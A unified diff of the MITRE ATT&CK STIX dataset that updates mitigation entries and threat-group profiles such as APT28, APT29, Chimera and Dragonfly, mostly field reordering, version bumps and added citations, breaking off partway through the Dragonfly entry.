"name": "Limit Software Installation", "external_references": [ { "source_name": "mitre-attack", @@ -209236,12 +233102,10 @@ "url": "https://attack.mitre.org/mitigations/M1033" } ], - "name": "Limit Software Installation", - "description": "Block users or groups from installing unapproved software.", - "id": "course-of-action--23843cff-f7b9-4659-a7b7-713ef347f547", - "type": "course-of-action", - "modified": "2019-06-11T16:26:52.202Z", - "created": "2019-06-11T16:26:52.202Z", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0" }, { @@ -209529,12 +233393,10 @@ "x_mitre_version": "1.0" }, { - "created": "2019-06-10T20:53:36.319Z", - "modified": "2019-06-10T20:53:36.319Z", - "type": "course-of-action", - "id": "course-of-action--b045d015-6bed-4490-bd38-56b41ece59a0", - "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", - "name": "Multi-factor Authentication", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "source_name": "mitre-attack", @@ -209542,10 +233404,12 @@ "url": "https://attack.mitre.org/mitigations/M1032" } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "id": "course-of-action--b045d015-6bed-4490-bd38-56b41ece59a0", + "type": "course-of-action", + "modified": "2019-06-10T20:53:36.319Z", + "created": "2019-06-10T20:53:36.319Z", "x_mitre_version": "1.0" }, { @@ -210143,10 +234007,12 @@ "x_mitre_version": "1.0" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], + "created": "2019-06-06T21:10:35.792Z", + "modified": "2019-06-06T21:10:35.792Z", + "type": "course-of-action", + "id": "course-of-action--90c218c3-fbf8-4830-98a7-e8cfb7eaa485", + "description": "Set and enforce secure password policies for accounts.", + "name": "Password Policies", "external_references": [ { "source_name": "mitre-attack", @@ -210154,12 +234020,10 @@ "url": "https://attack.mitre.org/mitigations/M1027" } ], - "name": "Password Policies", - "description": "Set and enforce secure password policies for accounts.", - "id": "course-of-action--90c218c3-fbf8-4830-98a7-e8cfb7eaa485", - "type": "course-of-action", - "modified": "2019-06-06T21:10:35.792Z", - "created": "2019-06-06T21:10:35.792Z", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0" }, { @@ -210430,6 +234294,26 @@ "x_mitre_deprecated": true, "x_mitre_version": "1.0" }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1056", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "name": "Pre-compromise", + "id": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "type": "course-of-action", + "modified": "2020-10-20T19:52:32.439Z", + "created": "2020-10-19T14:57:58.771Z", + "x_mitre_version": "1.0" + }, { "id": "course-of-action--f27ef4f2-71fe-48b6-b7f4-02dcac14320e", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -210452,9 +234336,13 @@ "x_mitre_version": "1.0" }, { - "id": "course-of-action--9bb9e696-bff8-4ae1-9454-961fc7d91d5f", - "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", - "name": "Privileged Account Management", + "created": "2019-06-06T21:09:47.115Z", + "modified": "2020-03-31T13:08:36.655Z", + "type": "course-of-action", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "source_name": "mitre-attack", @@ -210462,13 +234350,9 @@ "url": "https://attack.mitre.org/mitigations/M1026" } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "type": "course-of-action", - "modified": "2020-03-31T13:08:36.655Z", - "created": "2019-06-06T21:09:47.115Z", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "id": "course-of-action--9bb9e696-bff8-4ae1-9454-961fc7d91d5f", "x_mitre_version": "1.1" }, { @@ -213011,7 +236895,7 @@ }, { "id": "course-of-action--2a4f6c11-a4a7-4cb9-b0ef-6ae1bb3a718a", - "description": "Train users to to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", "name": "User Training", "external_references": [ { @@ -213025,9 +236909,9 @@ ], "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "type": "course-of-action", - "modified": "2020-03-31T13:11:34.857Z", + "modified": "2020-10-21T19:08:13.228Z", "created": "2019-06-06T16:50:04.963Z", - "x_mitre_version": "1.1" + "x_mitre_version": "1.2" }, { "id": "course-of-action--d45f03a8-790a-4f90-b956-cd7e5b8886bf", @@ -213371,7 +237255,7 @@ }, { "source_name": "QiAnXin APT-C-36 Feb2019", - "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", + "url": "https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020." } ], @@ -213383,7 +237267,7 @@ "APT-C-36", "Blind Eagle" ], - "modified": "2020-05-07T22:53:31.155Z", + "modified": "2020-10-14T14:40:36.467Z", "created": "2020-05-05T18:53:08.166Z", "x_mitre_version": "1.0", "x_mitre_contributors": [ @@ -213422,9 +237306,9 @@ "description": "(Citation: CrowdStrike Putter Panda)" }, { - "source_name": "Mandiant APT1", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", - "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + "source_name": "Mandiant APT1" }, { "url": "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf", @@ -213438,9 +237322,9 @@ "Comment Group", "Comment Panda" ], - "modified": "2020-03-30T01:45:32.007Z", + "modified": "2020-10-22T18:35:55.290Z", "created": "2017-05-31T21:31:47.955Z", - "x_mitre_version": "1.2" + "x_mitre_version": "1.3" }, { "type": "intrusion-set", @@ -213519,17 +237403,17 @@ "description": "(Citation: FireEye EPS Awakens Part 2)" }, { - "url": "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html", + "source_name": "FireEye EPS Awakens Part 2", "description": "Winters, R.. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.", - "source_name": "FireEye EPS Awakens Part 2" + "url": "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html" } ], "aliases": [ "APT16" ], - "modified": "2019-03-22T14:20:45.561Z", + "modified": "2020-10-12T19:54:58.537Z", "created": "2017-05-31T21:31:56.270Z", - "x_mitre_version": "1.0" + "x_mitre_version": "1.1" }, { "type": "intrusion-set", @@ -213564,9 +237448,9 @@ "APT17", "Deputy Dog" ], - "modified": "2019-03-22T14:21:19.419Z", + "modified": "2020-10-13T22:33:14.018Z", "created": "2017-05-31T21:31:57.307Z", - "x_mitre_version": "1.0" + "x_mitre_version": "1.1" }, { "type": "intrusion-set", @@ -213702,27 +237586,11 @@ "x_mitre_version": "1.3" }, { - "created": "2017-05-31T21:31:48.664Z", - "modified": "2020-03-30T15:28:00.965Z", - "aliases": [ - "APT28", - "SNAKEMACKEREL", - "Swallowtail", - "Group 74", - "Sednit", - "Sofacy", - "Pawn Storm", - "Fancy Bear", - "STRONTIUM", - "Tsar Team", - "Threat Group-4127", - "TG-4127" - ], "type": "intrusion-set", "id": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "name": "APT28", - "description": "[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's Main Intelligence Directorate of the Russian General Staff by a July 2018 U.S. Department of Justice indictment. This group reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. [APT28](https://attack.mitre.org/groups/G0007) has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018) (Citation: Ars Technica GRU indictment Jul 2018) (Citation: Crowdstrike DNC June 2016) (Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: FireEye APT28 January 2017) (Citation: GRIZZLY STEPPE JAR) (Citation: Sofacy DealersChoice) (Citation: Palo Alto Sofacy 06-2018) (Citation: Symantec APT28 Oct 2018) (Citation: ESET Zebrocy May 2019)", + "description": "[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018) (Citation: Ars Technica GRU indictment Jul 2018) (Citation: Crowdstrike DNC June 2016) (Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: FireEye APT28 January 2017) (Citation: GRIZZLY STEPPE JAR) (Citation: Sofacy DealersChoice) (Citation: Palo Alto Sofacy 06-2018) (Citation: Symantec APT28 Oct 2018) (Citation: ESET Zebrocy May 2019)\n\n[APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. (Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034). ", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -213766,7 +237634,7 @@ }, { "source_name": "STRONTIUM", - "description": "(Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Microsoft STRONTIUM Aug 2019)" + "description": "(Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Microsoft STRONTIUM Aug 2019) (Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)" }, { "source_name": "Tsar Team", @@ -213781,9 +237649,14 @@ "description": "(Citation: SecureWorks TG-4127)" }, { - "url": "https://www.justice.gov/file/1080281/download", + "source_name": "NSA/FBI Drovorub August 2020", + "url": "https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF", + "description": "NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020." + }, + { + "source_name": "DOJ GRU Indictment Jul 2018", "description": "Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.", - "source_name": "DOJ GRU Indictment Jul 2018" + "url": "https://www.justice.gov/file/1080281/download" }, { "url": "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", @@ -213791,14 +237664,14 @@ "source_name": "Ars Technica GRU indictment Jul 2018" }, { - "url": "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "source_name": "Crowdstrike DNC June 2016", "description": "Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.", - "source_name": "Crowdstrike DNC June 2016" + "url": "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" }, { - "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf", + "source_name": "FireEye APT28", "description": "FireEye. (2015). APT28: A WINDOW INTO RUSSIA\u2019S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.", - "source_name": "FireEye APT28" + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf" }, { "url": "https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign", @@ -213806,9 +237679,9 @@ "source_name": "SecureWorks TG-4127" }, { - "url": "https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf", + "source_name": "FireEye APT28 January 2017", "description": "FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.", - "source_name": "FireEye APT28 January 2017" + "url": "https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf" }, { "source_name": "GRIZZLY STEPPE JAR", @@ -213821,14 +237694,14 @@ "url": "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/" }, { - "url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", + "source_name": "Palo Alto Sofacy 06-2018", "description": "Lee, B., Falcone, R. (2018, June 06). Sofacy Group\u2019s Parallel Attacks. Retrieved June 18, 2018.", - "source_name": "Palo Alto Sofacy 06-2018" + "url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/" }, { - "description": "Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.", + "source_name": "Symantec APT28 Oct 2018", "url": "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government", - "source_name": "Symantec APT28 Oct 2018" + "description": "Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018." }, { "description": "ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.", @@ -213836,9 +237709,14 @@ "source_name": "ESET Zebrocy May 2019" }, { - "url": "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/", + "source_name": "US District Court Indictment GRU Oct 2018", + "url": "https://www.justice.gov/opa/page/file/1098481/download", + "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020." + }, + { + "source_name": "Kaspersky Sofacy", "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.", - "source_name": "Kaspersky Sofacy" + "url": "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/" }, { "source_name": "ESET Sednit Part 3", @@ -213851,37 +237729,51 @@ "source_name": "Talos Seduploader Oct 2017" }, { - "description": "Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.", + "source_name": "Securelist Sofacy Feb 2018", "url": "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/", - "source_name": "Securelist Sofacy Feb 2018" + "description": "Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018." }, { - "description": "Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.", + "source_name": "Accenture SNAKEMACKEREL Nov 2018", "url": "https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50", - "source_name": "Accenture SNAKEMACKEREL Nov 2018" + "description": "Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019." }, { "description": "MSRC Team. (2019, August 5). Corporate IoT \u2013 a path to intrusion. Retrieved August 16, 2019.", "url": "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/", "source_name": "Microsoft STRONTIUM Aug 2019" + }, + { + "source_name": "Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020", + "url": "https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/", + "description": "Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020." } ], + "aliases": [ + "APT28", + "SNAKEMACKEREL", + "Swallowtail", + "Group 74", + "Sednit", + "Sofacy", + "Pawn Storm", + "Fancy Bear", + "STRONTIUM", + "Tsar Team", + "Threat Group-4127", + "TG-4127" + ], + "modified": "2020-10-06T23:32:21.793Z", + "created": "2017-05-31T21:31:48.664Z", "x_mitre_contributors": [ + "S\u00e9bastien Ruel, CGI", "Drew Church, Splunk", "Emily Ratliff, IBM", "Richard Gold, Digital Shadows" ], - "x_mitre_version": "2.3" + "x_mitre_version": "3.0" }, { - "type": "intrusion-set", - "id": "intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "APT29", - "description": "[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to the Russian government and has operated since at least 2008. (Citation: F-Secure The Dukes) (Citation: GRIZZLY STEPPE JAR) This group reportedly compromised the Democratic National Committee starting in the summer of 2015. (Citation: Crowdstrike DNC June 2016)", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], "external_references": [ { "source_name": "mitre-attack", @@ -213890,7 +237782,7 @@ }, { "source_name": "APT29", - "description": "(Citation: F-Secure The Dukes)(Citation: FireEye APT29 Nov 2018)" + "description": "(Citation: F-Secure The Dukes)(Citation: FireEye APT29 Nov 2018)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)" }, { "source_name": "YTTRIUM", @@ -213898,20 +237790,20 @@ }, { "source_name": "The Dukes", - "description": "(Citation: F-Secure The Dukes)" + "description": "(Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)" }, { "source_name": "Cozy Bear", - "description": "(Citation: Crowdstrike DNC June 2016)" + "description": "(Citation: Crowdstrike DNC June 2016)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)" }, { "source_name": "CozyDuke", "description": "(Citation: Crowdstrike DNC June 2016)" }, { - "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf", + "source_name": "F-Secure The Dukes", "description": "F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.", - "source_name": "F-Secure The Dukes" + "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf" }, { "source_name": "GRIZZLY STEPPE JAR", @@ -213919,21 +237811,39 @@ "url": "https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf" }, { - "url": "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "source_name": "Crowdstrike DNC June 2016", "description": "Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.", - "source_name": "Crowdstrike DNC June 2016" + "url": "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" }, { "description": "Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.", "url": "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", "source_name": "FireEye APT29 Nov 2018" }, + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + }, + { + "source_name": "NCSC APT29 July 2020", + "url": "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf", + "description": "National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020." + }, { "source_name": "Microsoft Unidentified Dec 2018", "url": "https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/", "description": "Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019." } ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "description": "[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to the Russian government and has operated since at least 2008. (Citation: F-Secure The Dukes) (Citation: GRIZZLY STEPPE JAR) This group reportedly compromised the Democratic National Committee starting in the summer of 2015. (Citation: Crowdstrike DNC June 2016)", + "name": "APT29", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542", + "type": "intrusion-set", "aliases": [ "APT29", "YTTRIUM", @@ -213941,9 +237851,9 @@ "Cozy Bear", "CozyDuke" ], - "modified": "2020-03-30T18:48:05.505Z", + "modified": "2020-10-22T19:06:15.392Z", "created": "2017-05-31T21:31:52.748Z", - "x_mitre_version": "1.3" + "x_mitre_version": "1.4" }, { "external_references": [ @@ -214037,7 +237947,7 @@ "id": "intrusion-set--f047ee18-7985-4946-8bfb-4ed754d3a0dd", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "name": "APT30", - "description": "[APT30](https://attack.mitre.org/groups/G0013) is a threat group suspected to be associated with the Chinese government. (Citation: FireEye APT30) While [Naikon](https://attack.mitre.org/groups/G0019) shares some characteristics with [APT30](https://attack.mitre.org/groups/G0013), the two groups do not appear to be exact matches. (Citation: Baumgartner Golovkin Naikon 2015)", + "description": "[APT30](https://attack.mitre.org/groups/G0013) is a threat group suspected to be associated with the Chinese government. While [Naikon](https://attack.mitre.org/groups/G0019) shares some characteristics with [APT30](https://attack.mitre.org/groups/G0013), the two groups do not appear to be exact matches.(Citation: FireEye APT30)(Citation: Baumgartner Golovkin Naikon 2015)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -214065,9 +237975,9 @@ "aliases": [ "APT30" ], - "modified": "2019-03-22T18:44:28.439Z", + "modified": "2020-07-29T19:34:28.999Z", "created": "2017-05-31T21:31:51.026Z", - "x_mitre_version": "1.0" + "x_mitre_version": "1.1" }, { "type": "intrusion-set", @@ -214279,9 +238189,9 @@ "Group123", "TEMP.Reaper" ], - "modified": "2020-06-23T19:36:24.680Z", + "modified": "2020-10-21T18:55:20.925Z", "created": "2018-04-18T17:59:24.739Z", - "x_mitre_version": "1.4", + "x_mitre_version": "1.5", "x_mitre_contributors": [ "Valerii Marchuk, Cybersecurity Help s.r.o." ] @@ -214329,12 +238239,6 @@ "x_mitre_version": "1.2" }, { - "created": "2019-02-19T16:01:38.585Z", - "modified": "2020-05-29T20:22:10.625Z", - "aliases": [ - "APT39", - "Chafer" - ], "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" @@ -214373,7 +238277,13 @@ "description": "[APT39](https://attack.mitre.org/groups/G0087) is an Iranian cyber espionage group that has been active since at least 2014. They have targeted the telecommunication and travel industries to collect personal information that aligns with Iran's national priorities. (Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer Dec 2015)", "type": "intrusion-set", "id": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80", - "x_mitre_version": "2.1" + "aliases": [ + "APT39", + "Chafer" + ], + "modified": "2020-08-11T15:46:26.496Z", + "created": "2019-02-19T16:01:38.585Z", + "x_mitre_version": "2.3" }, { "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -214720,6 +238630,34 @@ "created": "2018-01-16T00:14:20.562Z", "x_mitre_version": "1.0" }, + { + "id": "intrusion-set--8c1f0187-0826-4320-bddc-5f326cfcfe2c", + "type": "intrusion-set", + "name": "Chimera", + "description": "[Chimera](https://attack.mitre.org/groups/G0114) is a suspected China-based threat group, targeting the semiconductor industry in Taiwan since at least 2018.(Citation: Cycraft Chimera April 2020)", + "external_references": [ + { + "external_id": "G0114", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0114" + }, + { + "source_name": "Cycraft Chimera April 2020", + "url": "https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf", + "description": "Cycraft. (2020, April 15). APT Group Chimera - APT Operation Skeleton key Targets Taiwan Semiconductor Vendors. Retrieved August 24, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "aliases": [ + "Chimera" + ], + "modified": "2020-10-05T20:59:57.694Z", + "created": "2020-08-24T17:01:55.842Z", + "x_mitre_version": "1.0" + }, { "type": "intrusion-set", "id": "intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063", @@ -214748,9 +238686,9 @@ "description": "(Citation: Dell Threat Group 2889)" }, { - "url": "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf", + "source_name": "Cylance Cleaver", "description": "Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.", - "source_name": "Cylance Cleaver" + "url": "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" }, { "url": "http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/", @@ -214763,9 +238701,9 @@ "Threat Group 2889", "TG-2889" ], - "modified": "2020-03-30T18:53:45.117Z", + "modified": "2020-10-15T16:59:26.732Z", "created": "2017-05-31T21:31:46.390Z", - "x_mitre_version": "1.1" + "x_mitre_version": "1.2" }, { "type": "intrusion-set", @@ -215150,14 +239088,6 @@ "x_mitre_version": "1.0" }, { - "type": "intrusion-set", - "id": "intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "Dragonfly", - "description": "[Dragonfly](https://attack.mitre.org/groups/G0035) is a cyber espionage group that has been active since at least 2011. They initially targeted defense and aviation companies but shifted to focus on the energy sector in early 2013. They have also targeted companies related to industrial control systems. (Citation: Symantec Dragonfly)\n\nA similar group emerged in 2015 and was identified by Symantec as [Dragonfly 2.0](https://attack.mitre.org/groups/G0074). There is debate over the extent of the overlap between [Dragonfly](https://attack.mitre.org/groups/G0035) and [Dragonfly 2.0](https://attack.mitre.org/groups/G0074), but there is sufficient evidence to lead to these being tracked as two separate groups. (Citation: Symantec Dragonfly Sept 2017) (Citation: Fortune Dragonfly 2.0 Sept 2017)", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], "external_references": [ { "source_name": "mitre-attack", @@ -215166,16 +239096,33 @@ }, { "source_name": "Dragonfly", - "description": "(Citation: Symantec Dragonfly)" + "description": "(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)" + }, + { + "source_name": "TG-4192", + "description": "(Citation: Secureworks IRON LIBERTY July 2019)" + }, + { + "source_name": "Crouching Yeti", + "description": "(Citation: Secureworks IRON LIBERTY July 2019)" + }, + { + "source_name": "IRON LIBERTY", + "description": "(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019)" }, { "source_name": "Energetic Bear", - "description": "(Citation: Symantec Dragonfly)" + "description": "(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019)" }, { - "url": "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf", + "source_name": "Symantec Dragonfly", "description": "Symantec Security Response. (2014, July 7). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.", - "source_name": "Symantec Dragonfly" + "url": 